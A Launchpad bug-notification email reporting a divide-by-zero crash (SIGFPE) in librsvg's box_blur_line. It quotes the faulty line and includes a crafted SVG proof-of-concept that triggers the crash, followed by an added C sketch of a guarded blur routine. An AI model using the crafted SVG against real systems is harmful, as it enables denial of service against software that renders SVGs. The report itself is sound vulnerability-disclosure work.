** Information type changed from Private Security to Public Security

** Changed in: librsvg (Ubuntu)
       Status: New => Confirmed

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to librsvg in Ubuntu.
https://bugs.launchpad.net/bugs/1697283

Title:
  Denial of Service Vulnerability in Librsvg

Status in librsvg package in Ubuntu:
  Confirmed

Bug description:
  A SIGFPE is raised in function box_blur_line of rsvg-filter.c when
  librsvg tries to parse a crafted SVG file.

  https://github.com/GNOME/librsvg/blob/master/rsvg-filter.c#L1439

  if (output >= 0)
      dest[bpp * output + i] = (ac[i] + (coverage >> 1)) / coverage;
  }

  The coverage could be zero.

  testcase.svg

  <svg width="100" height="120"
   xmlns="http://www.w3.org/2000/svg"
   xmlns:xlink="http://www.w3.org/1999/xlink">

    <filter id="blurMe">
      <feGaussianBlur in="SourceGraphic" stdDeviation="0.053192302807822195 20" />
    </filter>

    <circle cx="50" cy="50" r="50" fill="green"
            filter="url(#blurMe)" />
  </svg>

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/librsvg/+bug/1697283/+subscriptions
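Added illustration (not librsvg's code): the SVG 1.1 box-filter approximation of a Gaussian maps the reported x stdDeviation to a zero-width box, and a simplified, hypothetical box_blur_line_safe shows the guard that keeps the rounded average from dividing by a zero coverage. The 3-pixel sample line is constructed for the demo.

```c
#include <stddef.h>
#include <stdint.h>

/* SVG 1.1 approximation: d = floor(s * 3*sqrt(2*pi)/4 + 0.5).
 * 3*sqrt(2*pi)/4 is written out as a literal to avoid libm.
 * For s = 0.053192302807822195 this gives 0, i.e. an empty box.
 * (Spec formula; librsvg's own mapping is not shown in the report.) */
int box_size_for_std_dev(double s)
{
    if (s < 0.0)
        return -1;                     /* negative stdDeviation is invalid */
    return (int) (s * 1.8799712059732503 + 0.5); /* cast == floor for s >= 0 */
}

/* Hypothetical hardened 1-D box blur of one channel over one scanline.
 * Returns 0 on success, -1 when the box is empty, instead of dividing
 * by a zero coverage as the expression quoted in the report can. */
int box_blur_line_safe(const uint8_t *src, uint8_t *dst, size_t len, int box)
{
    if (box <= 0 || len == 0)
        return -1;                     /* nothing to average: refuse, don't crash */
    for (size_t x = 0; x < len; x++) {
        unsigned acc = 0, coverage = 0;
        /* accumulate 'box' pixels centred on x, clipped to the line; the
         * centre pixel is always inside, so coverage >= 1 here */
        for (int k = -(box / 2); k < box - box / 2; k++) {
            long p = (long) x + k;
            if (p < 0 || (size_t) p >= len)
                continue;
            acc += src[p];
            coverage++;
        }
        /* rounded integer average, same form as the line in the report */
        dst[x] = (uint8_t) ((acc + (coverage >> 1)) / coverage);
    }
    return 0;
}

/* Constructed sample: blur {0,100,200} with the given box and return pixel idx,
 * or -1 when the blur was refused. */
int blurred_sample(int box, size_t idx)
{
    static const uint8_t src[3] = {0, 100, 200};
    uint8_t dst[3] = {0, 0, 0};
    if (idx >= 3 || box_blur_line_safe(src, dst, 3, box) != 0)
        return -1;
    return dst[idx];
}
```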

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to     : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp